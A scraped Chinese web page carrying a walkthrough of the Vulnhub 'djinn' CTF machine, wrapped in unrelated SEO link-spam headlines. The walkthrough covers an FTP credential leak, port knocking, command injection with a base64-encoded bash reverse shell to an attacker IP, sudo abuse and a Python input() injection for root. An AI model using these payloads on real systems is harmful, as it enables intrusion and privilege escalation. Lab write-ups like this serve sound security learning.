当前位置: 首页 > news >正文

团购网站html模板wordpress 函数手册

news 2026/5/4 21:13:20
团购网站html模板,wordpress 函数手册,乐清新闻,常州seo一、测试环境#xff1a; kail攻击机#xff1a;Get Kali | Kali Linux 靶场镜像#xff1a;https://download.vulnhub.com/djinn/djinn.ova 描述#xff1a; 该机器与 VirtualBox 和 VMWare 兼容。DHCP 将自动分配一个 IP。您将在登录屏幕上看到 IP。您必须找到并读取分…一、测试环境 kail攻击机Get Kali | Kali Linux 靶场镜像https://download.vulnhub.com/djinn/djinn.ova 描述 该机器与 VirtualBox 和 VMWare 兼容。DHCP 将自动分配一个 IP。您将在登录屏幕上看到 IP。您必须找到并读取分别存在于 user.txt 和 root.txt 中的两个标志user 和 root。 二、测试过程 1、端口扫描 靶机开机给出目标地址使用nmap进行端口扫描tcp和udp都扫一下多扫两边 扫描已找到的端口服务版本信息等 nmap漏洞脚本扫描端口服务没什么有效信息 2、服务漏洞查找 a、FTP服务匿名访问 尝试允许匿名访问下载文件 查看文件creds.txt中有一个nitu:81299账号密码先保留。 game.txt文件中提到1337端口有一个游戏通过最后一关会有奖品保留信息。 message.txt文件中提到nitish81299,后面没啥用和第一个文件中有重复没明白。 b、1337端口数字游戏 先看看1337端口是个数字游戏需要回答1000次才能通过实际回答了1001次自己不会写用AI写了个python脚本跑一下。 python脚本如下 import telnetlib import re# 目标服务器的IP和端口 host 192.168.229.151 port 1337# 建立Telnet连接 tn telnetlib.Telnet(host, port)# 用于匹配运算表达式的正则表达式 pattern re.compile(r\((\d), \([\-*/])\, (\d)\))count 0 while count 1002:data tn.read_until(b).decode(utf-8)print(data)match pattern.search(data)if match:num1 int(match.group(1))operator match.group(2)num2 int(match.group(3))result Noneif operator :result num1 num2elif operator -:result num1 - num2elif operator *:result num1 * num2elif operator /:result num1 // num2tn.write(f{result}\n.encode(utf-8))count 1tn.close() 跑完发现三个数组可能是端口号尝试telnet发现不同通网上看贴子博主说是knock: 端口敲门是一种通过按照特定顺序向服务器的一系列端口发送连接请求通常是 TCP 或 UDP 数据包来触发某种动作如开放特定隐藏服务端口、允许访问等的技术。其目的在于增加服务器安全性让服务对于未按特定敲门序列进行访问尝试的外部连接保持隐匿状态只有知道正确敲门序列的客户端才能最终获得所需服务的访问权限。 那就使用kali自带的knock工具敲一下端口然后telnet 22果然通了目前没账号密码爆破也没用,先放着 c、7331端口WEB服务 端口扫描看到7331端口为http访问到一个界面没找到什么有效信息 对网站目录扫描 dirsearch目录扫描默认没扫出来使用dirbuster字典扫到两个路径 dirsearch -u http://192.168.229.151:7331 -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt 3、获取低权限shell 访问/wish页面看到一个类似可执行的输入框尝试能否执行命令 查看源码存在命令执行且有回显可以尝试反弹shell 生成一个反弹shell,写入对话框kali机监听8080端口web页面执行反弹shell,查看源码发现回显报错“Wrong choice of words”提示单词错误可能有过滤使用base64编码测试成功 原反弹shell: bash -i /dev/tcp/192.168.229.152/8080 01 base64编码后做解码的反弹shell: echo YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjIyOS4xNTIvODA4MCAwPiYx|base64 -d |bash 获取shell之后要做的第一件事是获取一个tty因为在执行有些命令发现提示“su: must be run from a terminal” python获取tty python -c import pty;pty.spawn(/bin/bash) 发现当前目录下有两个文件夹三个文件寻找有效信息打开app.py发现是做了过滤操作且有一个/home/nitish/.dev/creds.txt文件也被过滤先留着 找到一个user.txt但是权限不够没看到root.txt估计只有root权限才能看到 那就再看看/home/nitish/.dev/creds.txt文件 似乎是一组账户密码直接su过去试试可以登录 切换当前用户目录查看第一个flag 4、权限提升 使用sudo -l查看发现sam用户执行genie命令不需要密码 查看genie命令使用方法-h查看用法不全使用man命令查看说明 发现共有五个选项可使用-p /bin/sh没用 -cmd选项可以直接进入sam用户权限 再次使用sudo -l 命令查看有一个/root/lago命令sudo -u root /root/lago需要sam密码sudo /root/lago可以使用进入四个选项都没找到有效信息 无果后使用find查找可写入文件 find / -writable -type f 2/dev/null 发现一个python编译后的文件导出反编译查看代码发现回答第二个问题时输入变量名num将执行/bin/sh 反编译结果 #!/usr/bin/env python # visit https://tool.lu/pyc/ for more information # Version: Python 2.7 from getpass import getuser from os import system from random import randint def naughtyboi():     print Working on it!! def guessit():     num randint(1, 101)     print Choose a number between 1 to 100:     s input(Enter your number: )     if s num:         system(/bin/sh)     else:         print Better Luck next time def readfiles():     user getuser()     path input(Enter the full of the file to read: )     print User %s is not allowed to read %s % (user, path) def options():     print What do you want to do ?     print 1 - Be naughty     print 2 - Guess the number     print 3 - Read some damn files     print 4 - Work     choice int(input(Enter your choice: ))     return choice def main(op):     if op 1:         naughtyboi()     elif op 2:         guessit()     elif op 3:         readfiles()     elif op 4:         print work your ass off!!     else:         print Do something better with your life if __name__ __main__:     main(options())   再次使用sudo /root/lago进入第二个问题输入num进入root权限使用find查找root.txt没找到进入root目录下看到proof.sh可执行文件查看或者执行拿到最后的flag
http://www.hkea.cn/news/14532983/

相关文章:

  • 烟台建站价格经营网站需要什么资质
  • 教育投资网站建设方案亚马逊官网中国网页版
  • 网站美工用什么软件做进出口外贸网站
  • 网站建设定制开发价格湛江做网站咨询电话
  • 15年做那些网站致富上海网站制作顾问
  • 郑州高端网站开发免费动画模板素材网站
  • 建设企业网站报价网站导航app
  • 什么是a站有没有哪个网站怎么做动漫新闻的
  • 大型网站设计公司中国纪检监察报理论版
  • 快速网站开发介绍商场装修
  • 机械行业网站模板外贸商城网站建站
  • 公司高端网站建设智能建造师证书有用吗
  • 爱网站黄页炫彩发光字制作
  • 手机 互动网站案例网站开发包括哪些工作
  • 黄冈网站建设收费高端房产网站建设
  • 高端网站定制的案例怎么做微帮网站
  • 做网站外贸怎么找客户济南网站制作搜到
  • 打造对外宣传工作平台网站建设做黑网站
  • 专注河南网站建设wap浏览器手机版下载
  • 重庆綦江网站制作公司电话百度公司的业务范围
  • 网站的源码深圳电子商城网站设计
  • 简述建设一个网站的基本步骤网站建设周记
  • 建设网站费用记什么科目网站建设有哪种方式
  • 梁山县城市建设局网站微信小程序商城软件开发
  • 北京高端企业网站建设阿里云cdn wordpress
  • 衡阳网站优化免费咨询做ptt有什么好的模板网站
  • 动易sitefactorycms 网站配置保存不了问题做学校网站的目的是什么
  • 巩义便宜网站建设公司做旅游销售网站平台ppt模板
  • php大型综合网站源码嘉兴网站建设定制
  • 网络公司网站源码 网络建设工作室网站模板 织梦广告设计公司源码成都app开发公司排名